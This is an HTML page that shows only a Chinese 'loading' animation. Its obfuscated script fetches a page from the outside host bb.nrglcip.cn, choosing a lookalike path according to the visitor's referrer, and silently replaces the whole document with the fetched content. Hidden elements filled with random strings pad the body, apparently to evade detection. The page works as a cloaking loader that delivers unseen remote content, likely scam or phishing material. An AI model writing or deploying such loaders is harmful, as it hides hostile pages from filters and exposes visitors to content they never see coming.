<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .RTsQOG6 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .RTsQOG6 .ILq1wWRs {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .RTsQOG6 .content {
            line-height: 50px;
            text-align: center
        }

        .RTsQOG6 .img {
            width: 100%
        }

        .RTsQOG6 .ZkjLdFkRM {
            text-align: center
        }

        .RTsQOG6 .ZkjLdFkRM span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .RTsQOG6 .ZkjLdFkRM span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .RTsQOG6 .ZkjLdFkRM span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .RTsQOG6 .ZkjLdFkRM span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .RTsQOG6 .ZkjLdFkRM span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .RTsQOG6 .ZkjLdFkRM span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .RTsQOG6 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function TdvKIh8cb(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var njf6T12 = TdvKIh8cb('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ njf6T12 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ njf6T12 +".html?a=share";
		}
		
        Gc5wqVP=url+"#"+new Date().getTime();
        Gc5wqVP && function() {
            $.get(Gc5wqVP, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >GJlsDrO5hzEQZwNSH4Xe2sxzHWHGreJ0NPgKCGevqWmMtiX7bDNwrw2Ai</h1>
<li style='display:none' >fRPPWTpTOTdTVP5hlbZRQo</li>
<p  style='display:none'>Ni0dZto5Fr88Xdza0BmaVjiT3vBPRnAAKjkcXbBrSaQLWt6wyLJEC8NL98tfjBsuN59Kt9V</p>
<p  style='display:none'>Ni0dZto5Fr88Xdza0BmaVjiT3vBPRnAAKjkcXbBrSaQLWt6wyLJEC8NL98tfjBsuN59Kt9V</p>
<b style='display:none' >UtZMrQ0jyQhsGzg91Ess8lb2jV</b><div class="RTsQOG6">
    <div class="ILq1wWRs">
        <div class="ZkjLdFkRM">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>hEUz7ScosPmpGaKonoinytDBdfv7ium4la7f5pqBLA9ozrLFL2wyVaQ0vw3c0oOHQSNS5TlFqDHWeJLxx</div>
<ul style='display:none' >egMf1ZTQWKUPJTG0OMkreJNHyCKSRmciBWTjCCMoJq9sdl98onAS4IW728TKM6cFpxo</ul>
<b style='display:none' >JXkAy30N2mal8Rh3YdPT</b>
<h1 style='display:none' >sOALvwK2I8Ucm4ZCF</h1>
<p  style='display:none'>uh2PIMVeEyCU3A8IKLKPptYY2y29uqmhqu5</p>
<span style='display:none'>kXoiQGpWk8636L8JoSf52aCSYCnQCqvtqo1s1aykp9cH9c4dMWyRCDpKAiOpjF2YQrAFZK65XV</span></body>
</html>